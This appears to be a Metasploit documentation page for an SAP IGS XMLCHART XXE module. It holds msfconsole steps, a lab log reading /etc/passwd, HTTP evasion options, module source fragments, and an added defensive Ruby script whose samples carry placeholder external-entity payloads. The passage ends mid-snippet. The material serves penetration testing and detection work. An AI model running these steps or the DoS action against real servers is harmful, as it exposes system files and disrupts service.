SAP Internet Graphics Server (IGS) XMLCHART XXE - Metasploit
This page contains detailed information about how to use the auxiliary/admin/sap/sap_igs_xmlchart_xxe Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
Source code: modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
Disclosure date: 2018-03-14
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 40080
List of CVEs: CVE-2018-2392, CVE-2018-2393
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively, attackers can abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf auxiliary(sap_igs_xmlchart_xxe) > show targets
... a list of targets ...
msf auxiliary(sap_igs_xmlchart_xxe) > set TARGET target-id
msf auxiliary(sap_igs_xmlchart_xxe) > show options
... show and set options ...
msf auxiliary(sap_igs_xmlchart_xxe) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively, attackers can abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.
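The module sends the XML payload in a multipart POST to the XMLCHART page (by default /XMLCHART on port 40080). The following added example, which is not part of the Metasploit module, shows a defender-side triage check that flags captured POST requests to an XMLCHART endpoint whose body declares a DOCTYPE with an external entity; the request record fields (:src, :method, :port, :path, :body) and the sample records are constructed assumptions, and the regexes scan the raw body, so they work whether the XML is sent bare or inside a multipart form.

```ruby
# Added example (not the module's own code): triage HTTP request records
# captured in front of an SAP IGS instance and flag XXE markers on the
# XMLCHART page. Record layout (:src, :method, :port, :path, :body) is an
# assumed capture format, not an IGS or Metasploit structure.

# Default IGS HTTP port as documented for the module; the page path may sit
# under a different prefix (the module's URIPATH option), so match the suffix.
IGS_DEFAULT_PORT = 40080
XMLCHART_PATH = %r{/XMLCHART\z}i

# Markers that a chart-generation request has no legitimate reason to carry.
XXE_MARKERS = {
  doctype: /<!DOCTYPE\b/i,
  external_entity: /<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b/i,
  file_scheme: %r{\bfile:///}i
}.freeze

# Returns the names of the XXE markers present in the request body (may be empty).
def xxe_markers(request)
  body = request[:body].to_s
  XXE_MARKERS.select { |_, re| body.match?(re) }.keys
end

# :ignore for anything that is not a POST to an XMLCHART page,
# :benign for a plain chart request, :suspicious when XXE markers are present.
def classify_igs_request(request)
  is_post = request[:method].to_s.casecmp?('POST')
  return :ignore unless is_post && request[:path].to_s.match?(XMLCHART_PATH)

  xxe_markers(request).empty? ? :benign : :suspicious
end

# Reduces a batch of records to the suspicious ones plus the markers that fired.
def triage(requests)
  requests.each_with_object([]) do |req, hits|
    next unless classify_igs_request(req) == :suspicious

    hits << { src: req[:src], path: req[:path], markers: xxe_markers(req) }
  end
end

# Constructed sample records (not real traffic). The XML element names are
# placeholders, not the real IGS chart schema.
SAMPLE_REQUESTS = [
  { src: '10.0.0.5', method: 'POST', port: IGS_DEFAULT_PORT, path: '/XMLCHART',
    body: '<?xml version="1.0"?><ChartData><Categories/></ChartData>' },
  { src: '10.0.0.9', method: 'POST', port: IGS_DEFAULT_PORT, path: '/XMLCHART',
    body: '<?xml version="1.0"?><!DOCTYPE d [<!ENTITY ext SYSTEM "file:///PLACEHOLDER">]>' \
          '<ChartData>&ext;</ChartData>' },
  { src: '10.0.0.7', method: 'GET', port: IGS_DEFAULT_PORT, path: '/XMLCHART', body: '' },
  { src: '10.0.0.8', method: 'POST', port: IGS_DEFAULT_PORT, path: '/igs/XMLCHART',
    body: '<!DOCTYPE d [<!ENTITY e SYSTEM "PLACEHOLDER">]><ChartData>&e;</ChartData>' },
  { src: '10.0.0.3', method: 'POST', port: 8080, path: '/other',
    body: '<!DOCTYPE a SYSTEM "x">' }
].freeze

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_REQUESTS).each do |hit|
    puts "#{hit[:src]} #{hit[:path]} markers=#{hit[:markers].join(',')}"
  end
end
```

A request that carries these markers is worth a look even when the host is patched, since a patched IGS is expected to reject it rather than silently succeed.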
Application Background
The Internet Graphics Service (IGS) provides an infrastructure that enables developers to display graphics in a web browser with minimal effort. It has been integrated into several SAP UI technologies, where it allows data from another SAP system or data source to be used to generate dynamic graphical or non-graphical output.
Installation Steps
Steps to install and update the SAP IGS server can be found online on this page. Additional information on configuring the IGS server can be found here. Finally, information on administering the IGS server can be found here.
Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.
Verification Steps
- Start msfconsole
- Do: workspace [WORKSPACE]
- Do: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
- Do: set RHOSTS [IP]
- Do: set FILE [remote file name]
- Do: set action READ
- Do: check
- Verify that the check method correctly identifies if the target is vulnerable or not.
- Do: run
- Verify that the contents of the file you specified were returned.
Options
FILE
File to read from the remote server. Example: /etc/passwd
URIPATH
This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE. By default it is set to /XMLCHART, however it can be changed if the SAP IGS server was installed under a different path than the web root. For example, if the SAP IGS server was installed to the /igs/ path under the web root, then this value would be set to /igs/XMLCHART.
Actions
Name Description
---- -----------
READ Remote file read
DOS Denial Of Service
Scenarios
Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies http:127.0.0.1:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.30.29 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
READ Remote file read
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29
[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.29 40080 tcp http open SAP Internet Graphics Server (IGS)
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2020-10-07 10:12:37 UTC 172.16.30.29 SAP Internet Graphics Server (IGS) XMLCHART XXE CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.29 igs.xmlchart.xxe /etc/passwd text/plain SAP IGS XMLCHART XXE /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
Msfconsole Usage
Here is how the admin/sap/sap_igs_xmlchart_xxe auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show info
Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2018-03-14
Provided by:
Yvan Genuer
Vladimir Ivanov
Available actions:
Name Description
---- -----------
DOS Denial Of Service
READ Remote file read
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Description:
This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE
vulnerabilities within the XMLCHART page of SAP Internet Graphics
Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53.
These vulnerabilities occur due to a lack of appropriate validation
on the Extension HTML tag when submitting a POST request to the
XMLCHART page to generate a new chart. Successful exploitation will
allow unauthenticated remote attackers to read files from the server
as the user from which the IGS service is started, which will
typically be the SAP admin user. Alternatively attackers can also
abuse the XXE vulnerability to conduct a denial of service attack
against the vulnerable SAP IGS server.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-2392
https://nvd.nist.gov/vuln/detail/CVE-2018-2393
https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
Module Options
This is a complete list of options available in the admin/sap/sap_igs_xmlchart_xxe auxiliary module:
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show options
Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
READ Remote file read
Advanced Options
Here is a complete list of advanced options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module:
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show advanced
Module advanced options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/sap/sap_igs_xmlchart_xxe module can do:
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show actions
Auxiliary actions:
Name Description
---- -----------
DOS Denial Of Service
READ Remote file read
Evasion Options
Here is the full list of possible evasion options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
- Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
- Error <E.CLASS>: <E>
- Picture
- Errors
- Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>
- Error <E.CLASS>: <E>
- The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
- The server sent a response but it was not in the expected format. The target is likely patched.
- The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights.
- The server did not respond to the second request in the expected manner and is therefore safe
- Some connection error occurred and it was not possible to determine if the server is vulnerable or not
- <HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched.
- <HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!
- <HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!
- The action <ACTION.NAME> is not a supported action.
- The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
- The server sent a response but it was not in the expected format. The target is likely patched.
- The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights.
- The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.
- The server responded successfully but the response indicated the server is not vulnerable!
- The server responded successfully but no download link was found in the response, so it is not vulnerable!
- Failed to get <FILE> content!
- Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
- Error <E.CLASS>: <E>
- The target responded with a 200 OK response code. The DoS attempt was unsuccessful.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>
Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:
164: 'ctype' => "multipart/form-data; boundary=#{@post_data.bound}",
165: 'data' => @post_data.to_s
166: }
167: )
168: rescue StandardError => e
169: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170: vprint_error("Error #{e.class}: #{e}")
171: return -1
172: end
173:
174: # Check first HTTP response
Error <E.CLASS>: <E>
Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:
165: 'data' => @post_data.to_s
166: }
167: )
168: rescue StandardError => e
169: print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170: vprint_error("Error #{e.class}: #{e}")
171: return -1
172: end
173:
174: # Check first HTTP response
175: if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
Picture
Here is a relevant code snippet related to the "Picture" error message:
170: vprint_error("Error #{e.class}: #{e}")
171: return -1
172: end
173:
174: # Check first HTTP response
175: if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176: return -2
177: end
178:
179: if first_response.body.include?('Errors')
180: return -3
Errors
Here is a relevant code snippet related to the "Errors" error message:
174: # Check first HTTP response
175: if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176: return -2
177: end
178:
179: if first_response.body.include?('Errors')
180: return -3
181: end
182:
183: first_response
184: end
Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>
Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>" error message:
195: 'uri' => normalize_uri(@download_link),
196: 'method' => 'GET'
197: }
198: )
199: rescue StandardError => e
200: print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201: vprint_error("Error #{e.class}: #{e}")
202: return -1 # Some exception was thrown whilst making the second HTTP request!
203: end
204:
205: # Check second HTTP response
Error <E.CLASS>: <E>
Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:
196: 'method' => 'GET'
197: }
198: )
199: rescue StandardError => e
200: print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201: vprint_error("Error #{e.class}: #{e}")
202: return -1 # Some exception was thrown whilst making the second HTTP request!
203: end
204:
205: # Check second HTTP response
206: if second_response.nil? || second_response.code != 200 || !second_response.body.include?('area shape=rect')
The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:
225: # so that the module can check if the target is vulnerable or not.
226:
227: # Get OS release information
228: check_response = send_first_request
229: if check_response == -1
230: Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231: elsif check_response == -2
232: Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233: else
234: if check_response == -3
235: vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
The server sent a response but it was not in the expected format. The target is likely patched.
Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:
227: # Get OS release information
228: check_response = send_first_request
229: if check_response == -1
230: Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231: elsif check_response == -2
232: Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233: else
234: if check_response == -3
235: vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236: else
237: result = analyze_first_response(check_response.body)
The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights.
Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights." error message:
230: Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231: elsif check_response == -2
232: Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233: else
234: if check_response == -3
235: vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236: else
237: result = analyze_first_response(check_response.body)
238:
239: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240: if result == -1 || result == -3
The server did not respond to the second request in the expected manner and is therefore safe
Here is a relevant code snippet related to the "The server did not respond to the second request in the expected manner and is therefore safe" error message:
236: else
237: result = analyze_first_response(check_response.body)
238:
239: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240: if result == -1 || result == -3
241: Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242: elsif result == -2
243: Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244: end
245:
246: if !@file_content.to_s.empty?
Some connection error occurred and it was not possible to determine if the server is vulnerable or not
Here is a relevant code snippet related to the "Some connection error occurred and it was not possible to determine if the server is vulnerable or not" error message:
238:
239: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240: if result == -1 || result == -3
241: Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242: elsif result == -2
243: Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244: end
245:
246: if !@file_content.to_s.empty?
247: if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248: os_release = "OS: #{os_regex[:os]}"
<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched.
Here is a relevant code snippet related to the "<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched." error message:
246: if !@file_content.to_s.empty?
247: if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248: os_release = "OS: #{os_regex[:os]}"
249: end
250: else
251: return Exploit::CheckCode::Safe("#{@host} did not return the contents of the requested file, aka #{os_release_file}. This host is likely patched.")
252: end
253: end
254: # Make ident
255: if os_release != ''
256: ident = "SAP Internet Graphics Server (IGS); #{os_release}"
<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!
Here is a relevant code snippet related to the "<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:
272: refs: references,
273: info: os_release
274: )
275: # Print Vulnerability
276: if os_release == ''
277: Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278: else
279: Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280: end
281: end
282: end
<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!
Here is a relevant code snippet related to the "<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:
274: )
275: # Print Vulnerability
276: if os_release == ''
277: Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278: else
279: Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280: end
281: end
282: end
283:
284: def run
The action <ACTION.NAME> is not a supported action.
Here is a relevant code snippet related to the "The action <ACTION.NAME> is not a supported action." error message:
286: when 'READ'
287: action_file_read
288: when 'DOS'
289: action_dos
290: else
291: print_error("The action #{action.name} is not a supported action.")
292: end
293: end
294:
295: def action_file_read
296: # Set up XML data for HTTP request
The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.
Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:
298: make_post_data(@file, dos: false)
299:
300: # Download remote file
301: first_response = send_first_request
302: if first_response == -1
303: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304: elsif first_response == -2
305: fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306: else
307: # Report Service and Vulnerability
308: report_service(
The server sent a response but it was not in the expected format. The target is likely patched.
Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:
300: # Download remote file
301: first_response = send_first_request
302: if first_response == -1
303: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304: elsif first_response == -2
305: fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306: else
307: # Report Service and Vulnerability
308: report_service(
309: host: @host,
310: port: @port,
The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights.
Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights." error message:
318: name: name,
319: refs: references
320: )
321: # Get remote file content
322: if first_response == -3
323: print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
324: else
325: result = analyze_first_response(first_response.body)
326: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327: if result == -1
328: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.
Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the second request and did not respond in the expected manner." error message:
323: print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
324: else
325: result = analyze_first_response(first_response.body)
326: # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327: if result == -1
328: fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329: elsif result == -2
330: print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331: return
332: elsif result == -3
333: print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
The server responded successfully but the response indicated the server is not vulnerable!
Here is a relevant code snippet related to the "The server responded successfully but the response indicated the server is not vulnerable!" error message:
        result = analyze_first_response(first_response.body)
        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
        if result == -1
          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
        elsif result == -2
          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
          return
        elsif result == -3
          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
          return
        end
The server responded successfully but no download link was found in the response, so it is not vulnerable!
Here is a relevant code snippet related to the "The server responded successfully but no download link was found in the response, so it is not vulnerable!" error message:
          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
        elsif result == -2
          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
          return
        elsif result == -3
          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
          return
        end

        if !@file_content.to_s.empty?
